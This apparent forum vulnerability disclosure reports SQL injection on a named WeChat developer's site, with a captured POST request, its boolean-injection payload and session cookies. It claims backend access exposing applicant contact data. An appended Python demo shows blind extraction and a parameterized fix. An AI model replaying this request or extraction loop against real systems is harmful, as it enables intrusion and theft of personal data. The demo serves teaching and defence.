HanDs
Administrator

[July vulnerability disclosure] SQL injection in the official website of a WeChat third-party developer (can expose the records of many applicants and agents in the backend)

Detailed description:

One POST injection, and I am already in the backend: admin.weiba66.com

Account and password

Masked area
*****llen6*****
*****wangj*****

Injection point

Code area
POST /service/ajaxLink HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.weiba66.com:80/
Cookie: ag_session=IPQAQEpeOTjHpI5NJZ6jeopnuavvO%2F93HCWVgcDugTz4WxDk9aEp5Q07xY4ivjWFYPFpGabHpf4o4Nwa12CMyvuZvOHRbHOPxZH1Ls%2BCSCrQs%2BWP9j8GV9drOOTsqzNPD3numUHhOAnrHJ7TBxRerg%2FhTQOsnqORy3w1Viv6pOtchCjAC0ftC35%2FuYDp4qcC1eyZDF9ifIVV78lr8kp8SBCim0VMvXr%2F2AF%2F9giR0ZyNlrH%2FktmpPLOxg9xZHwV%2FuGVhw8JXDaMUMVkXvyTFEtt%2BILfEuSiXfyRp6L%2BymeZFd2sTNJi6pr2tDZPxh2Citp37EdPeukfx3iDu3CWm84DTRe3Zlx1%2BE3XzpROq2xlrHGB5ESJnEj7K62lRzVnAUPGZoT%2FdJzVs6PKX9i4iKCyevBOVjte%2BSR3GiSnKhXf83nrj5Wn5OX%2F6BIEOZTu0pZw9mYm%2B2AUxmQ%2BcQH2ZC8VDkY8JUgRXeNK88C5PtEaDCW0NjMcJo8Wp0sF7BFvW8z7%2F5no7DTLMtr3Cc9feU6JFZfta7qYBADJ2N%2FEFxAZrzulj9kNcpaC5JbY7%2F1WoGuKAOaowoFtzQZ%2BENyM5kQh5EfQQc6703g2cXyPvW%2F%2BuAD6BKu2Ui5jcRnZAydiY; Hm_lvt_7e0672c2bc0acf201df277a0e9268004=1463220277,1463220684,1463220776,1463220800; Hm_lpvt_7e0672c2bc0acf201df277a0e9268004=1463220800; CNZZDATA1253384856=462479786-1463217860-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1463217860; _jzqx=1.1463218977.1463218977.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqa=1.920430318093333200.1463218844.1463218844.1463218844.1; _jzqc=1; _qzja=1.1925184389.1463218844224.1463218844224.1463218844224.1463220400516.1463220400638.0.0.0.15.1; _qzjb=1.1463218844224.15.0.0.0; _qzjc=1; _qzjto=15.1.0; _jzqb=1.10.10.1463218844.1; HMACCOUNT=A4D7CEFE20A00F10; qv_swfrfh=; qv_swfrfc=v20; qv_swfrfu=; v=ADM^ifaQD9:6yw9%wV%D; web_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225ce3b840d839df336f657de0c795ffc5%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%2214.121.122.124%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1463219209%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7De6d8af05e9ecf42f2fe88aa12a2800ca; Hm_lvt_5a4ba5491f78d218dd191f1bdc025828=1463219220; Hm_lpvt_5a4ba5491f78d218dd191f1bdc025828=1463219220; bdshare_firstime=1463219544832; BAIDUID=D53A2A20AD43D3236488985893BC8197:FG=1; cna=seW9D7eKfzYCAQ55enzgKzuC; sca=dab3f7a4; atpsida=d5293f1b9f17e8bb1fa59193_1463220145
Host: www.weiba66.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

case_id=86%20AND%203*2*1%3d6%20AND%20105%3d105

The case_id parameter is the vulnerable one.

Screenshots: 1.png, 2.png, 3.png

Leaks the names and contact details of many applicants

Screenshots: 4.png, 5.png, 6.png, 7.png, 8.png

Proof of vulnerability:

Screenshots 1.png through 8.png (the same images as above)

Fix recommendation:

I'm pretty much a noob, you sort it out yourselves.


#1
Posted: 2016-7-9   |   Views: 0   |   Replies: 0
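Added example (editor's code, not part of HanDs' post and not the site's own code). The captured POST body percent-decodes to `case_id=86 AND 3*2*1=6 AND 105=105`, which is a boolean-based probe: a tautology appended to the id must produce the same response as a plain `case_id=86`, and the same query with `3*2*1=7` must not. The Python below reproduces that oracle against a constructed in-memory SQLite table standing in for whatever the `/service/ajaxLink` handler really queries (the table name, columns, sample rows and handler logic are all assumptions), shows how the same yes/no oracle leaks a value the page never displays (a binary search on the length of a contact field, the building block for reading it out character by character), and gives the parameterized, integer-validated lookup that the empty "Fix recommendation" section leaves out.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data (not from the original post). The table stands in for
# whatever admin.weiba66.com's /service/ajaxLink handler really queries; the
# table name, columns and rows are assumptions made for this example.
SAMPLE_ROWS = [
    (85, "Trademark filing", "applicant-a@example.test"),
    (86, "Brand registration", "applicant-b@example.test"),
    (87, "Patent search", "applicant-c@example.test"),
]

# The POST body exactly as captured in the report, still percent-encoded.
CAPTURED_BODY = "case_id=86%20AND%203*2*1%3d6%20AND%20105%3d105"


def make_db():
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cases (case_id INTEGER PRIMARY KEY, title TEXT, applicant_contact TEXT)"
    )
    conn.executemany("INSERT INTO cases VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def decode_case_id(body):
    """Percent-decode the case_id field of a form-encoded body, as the server would."""
    return parse_qs(body, keep_blank_values=True)["case_id"][0]


def lookup_vulnerable(conn, case_id):
    """Hypothetical reconstruction of the bug class: the raw parameter is pasted
    into the WHERE clause, so anything after the number becomes SQL."""
    sql = "SELECT title, applicant_contact FROM cases WHERE case_id = " + case_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, case_id):
    """Fix: accept only an ASCII decimal id, then pass it as a bound parameter so
    the driver never interprets it as SQL."""
    if not (case_id.isascii() and case_id.isdigit()):
        raise ValueError("case_id must be a decimal integer")
    sql = "SELECT title, applicant_contact FROM cases WHERE case_id = ?"
    return conn.execute(sql, (int(case_id),)).fetchall()


def hardened_rejects(conn, case_id):
    """True when the hardened lookup refuses the value instead of running it."""
    try:
        lookup_hardened(conn, case_id)
        return False
    except ValueError:
        return True


def boolean_probe(conn, true_payload, false_payload):
    """The scanner's check: a tautology must reproduce the plain case_id=86
    response and a contradiction must not. True means the parameter is injectable."""
    baseline = lookup_vulnerable(conn, "86")
    return (lookup_vulnerable(conn, true_payload) == baseline
            and lookup_vulnerable(conn, false_payload) != baseline)


def oracle(conn, condition):
    """Yes/no oracle built from the same injection: AND an arbitrary condition onto
    the id and compare the response with the baseline."""
    return lookup_vulnerable(conn, "86 AND (" + condition + ")") == lookup_vulnerable(conn, "86")


def infer_contact_length(conn, target_case_id=86, limit=64):
    """Binary-search the length of a column the page never displays, one oracle
    query per step; the same loop, run per character, extracts the value itself."""
    lo, hi = 0, limit
    while lo < hi:
        mid = (lo + hi) // 2
        cond = (f"(SELECT length(applicant_contact) FROM cases "
                f"WHERE case_id = {target_case_id}) > {mid}")
        if oracle(conn, cond):
            lo = mid + 1
        else:
            hi = mid
    return lo


if __name__ == "__main__":
    db = make_db()
    payload = decode_case_id(CAPTURED_BODY)
    print("decoded payload:", payload)
    print("vulnerable lookup returns:", lookup_vulnerable(db, payload))
    print("injectable:", boolean_probe(db, payload, payload.replace("=6", "=7")))
    print("inferred contact length:", infer_contact_length(db))
    print("hardened lookup rejects payload:", hardened_rejects(db, payload))
```

The hardened lookup validates before binding on purpose: binding alone would already stop the injection, but rejecting anything that is not a plain integer also keeps the endpoint from becoming a boolean oracle through type coercion quirks, and it gives the application a clear place to log and alert on payloads like the one captured here.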